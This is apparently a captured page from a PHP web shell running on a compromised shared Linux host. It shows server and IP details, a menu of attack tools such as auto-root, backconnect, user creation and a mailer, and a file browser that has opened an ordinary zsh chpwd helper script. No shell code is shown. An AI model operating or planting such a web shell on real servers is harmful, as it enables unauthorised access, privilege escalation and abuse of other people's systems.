Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Chpwd /
[ HOME SHELL ]
Name
Size
Permission
Action
_cdr
1.17
KB
-rw-r--r--
cdr
11.95
KB
-rw-r--r--
chpwd_recent_add
506
B
-rw-r--r--
chpwd_recent_dirs
1.56
KB
-rw-r--r--
chpwd_recent_filehandler
1.15
KB
-rw-r--r--
zsh_directory_name_cdr
529
B
-rw-r--r--
zsh_directory_name_generic
4.24
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : chpwd_recent_filehandler
# With arguments, output those files to the recent directory file. # With no arguments, read in the directories from the file into $reply. # # Handles recent-dirs-file and recent-dirs-max styles. emulate -L zsh setopt extendedglob integer max local file line local -a files dir local default=${ZDOTDIR:-$HOME}/.chpwd-recent-dirs if zstyle -a ':chpwd:' recent-dirs-file files; then files=(${files//(#s)+(#e)/$default}) fi if (( ${#files} == 0 )); then files=($default) fi zstyle -s ':chpwd:' recent-dirs-max max || max=20 if (( $# )); then if (( max > 0 && ${#argv} > max )); then argv=(${argv[1,max]}) fi # Quote on write. # Use $'...' quoting... this fixes newlines and other nastiness. print -rl ${(qqqq)argv} >${files[1]} else typeset -g reply # Unquote on read. reply=() for file in $files; do [[ -r $file ]] || continue # Strip anything after the directory from the line. # At the moment there isn't anything, but we'll make this # future proof. for line in ${(f)"$(<$file)"}; do dir=(${(z)line}) reply+=(${(Q)${dir[1]}}) if (( max > 0 && ${#reply} == max )); then break 2 fi done done fi
Close